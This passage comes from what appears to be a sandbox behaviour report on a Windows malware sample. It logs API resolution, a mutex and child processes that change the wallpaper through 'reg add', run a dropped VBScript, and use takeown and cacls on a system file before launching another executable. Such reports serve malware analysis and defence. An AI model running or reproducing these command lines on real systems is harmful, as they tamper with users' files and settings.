| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarIdiv, address_out = 0x75c161a0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMod, address_out = 0x75c16400 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAnd, address_out = 0x75be3200 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarOr, address_out = 0x75c16610 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarXor, address_out = 0x75c167b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCmp, address_out = 0x75bd60b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarI4FromStr, address_out = 0x75bd6ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR4FromStr, address_out = 0x75be3010 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR8FromStr, address_out = 0x75be3630 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDateFromStr, address_out = 0x75bd8b90 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCyFromStr, address_out = 0x75bc2d90 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBoolFromStr, address_out = 0x75bd48f0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromCy, address_out = 0x75bd7f50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromDate, address_out = 0x75bd89c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromBool, address_out = 0x75bd48a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstanceEx, address_out = 0x75d62d10 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x75d32590 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoAddRefServerProcess, address_out = 0x75d5b8b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoReleaseServerProcess, address_out = 0x75d5b350 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoResumeClassObjects, address_out = 0x75d55c80 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoSuspendClassObjects, address_out = 0x75cbc190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeConditionVariable, address_out = 0x77c13a00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeConditionVariable, address_out = 0x77c88c50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeAllConditionVariable, address_out = 0x77c18a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableCS, address_out = 0x7500fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAIoctl, address_out = 0x746ae800 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = __WSAFDIsSet, address_out = 0x746b8fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = closesocket, address_out = 0x746b0910 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ioctlsocket, address_out = 0x746afa10 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAGetLastError, address_out = 0x746b8fe0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAStartup, address_out = 0x746a5b40 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSACleanup, address_out = 0x746b7170 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = accept, address_out = 0x746de430 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = bind, address_out = 0x746b1cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = connect, address_out = 0x746a5410 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getpeername, address_out = 0x746b43d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockname, address_out = 0x746b3750 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockopt, address_out = 0x746b3b30 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htonl, address_out = 0x746a49d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htons, address_out = 0x746b8ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_addr, address_out = 0x746b9160 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_ntoa, address_out = 0x746b9450 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = listen, address_out = 0x746a4be0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohl, address_out = 0x746a49d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohs, address_out = 0x746b8ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recv, address_out = 0x746b0c50 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recvfrom, address_out = 0x746ba8b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = select, address_out = 0x746a4ea0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = send, address_out = 0x746a5030 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = sendto, address_out = 0x746a5a20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = setsockopt, address_out = 0x746afd70 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = shutdown, address_out = 0x746b38a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = socket, address_out = 0x746b4510 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyaddr, address_out = 0x746d6b20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyname, address_out = 0x746d6cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobyname, address_out = 0x746d5bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobynumber, address_out = 0x746d5d10 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyname, address_out = 0x746d7020 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyport, address_out = 0x746d7210 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostname, address_out = 0x746d6e60 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getaddrinfo, address_out = 0x746a5810 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = freeaddrinfo, address_out = 0x746a4fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getnameinfo, address_out = 0x746b3560 |
|
1 |
System (82)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
64 | |
| Sleep | duration = -1 (infinite) |
|
1 | |
| Get Time | type = Performance Ctr, time = 14131712591 |
|
1 | |
| Get Time | type = Ticks, time = 141281 |
|
2 | |
| Get Time | type = Local Time, time = 2019-04-17 12:39:48 (Local Time) |
|
4 | |
| Get Time | type = Performance Ctr, time = 14131772359 |
|
1 | |
| Get Time | type = Ticks, time = 141296 |
|
1 | |
| Get Time | type = Performance Ctr, time = 14133831752 |
|
1 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Hardware Information |
|
2 | |
| Get Info | type = Operating System |
|
3 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MutexSDENDONW |
|
1 | |
| Open | mutex_name = MutexSDENDONW, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 |
Network Behavior
DNS (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Hostname | name_out = NQdPdE |
|
1 | |
| Resolve Name | host = NQdPdE, address_out = 192.168.0.66 |
|
1 |
Process #7: cmd.exe
85
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\WINDOWS\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\FD1HVy\AppData\Roaming\GJhtEkh2.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:50, Reason: Child Process |
| Unmonitor | End Time: 00:02:04, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x10fc |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1100
0x
117C
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00CD0000 | 0x00D28FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (20)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
10 | |
| Open | STD_INPUT_HANDLE | - |
|
8 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\reg.exe | os_pid = 0x11d4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\reg.exe | os_pid = 0x1200, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\reg.exe | os_pid = 0x1250, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (35)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
13 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
4 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
3 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 |
Process #8: cmd.exe
63
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\WINDOWS\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\FD1HVy\AppData\Roaming\eapzhiWZ.vbs" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:50, Reason: Child Process |
| Unmonitor | End Time: 00:04:01, Reason: Self Terminated |
| Monitor Duration | 00:02:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1104 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1108
0x
1190
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00CD0000 | 0x00D28FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (16)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
8 | |
| Open | STD_INPUT_HANDLE | - |
|
6 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 197, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\wscript.exe | os_pid = 0x11dc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #11: cmd.exe
367
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:52, Reason: Child Process |
| Unmonitor | End Time: 00:02:45, Reason: Self Terminated |
| Monitor Duration | 00:00:52 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1194 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1198
0x
11C0
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00CD0000 | 0x00D28FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (285)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | mxkeFu6a.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
139 | |
| Open | STD_INPUT_HANDLE | - |
|
15 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 77 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 62 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 14 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 52 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0x1234, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0x12e8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\mxkeFu6a.exe | os_pid = 0xce0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (51)
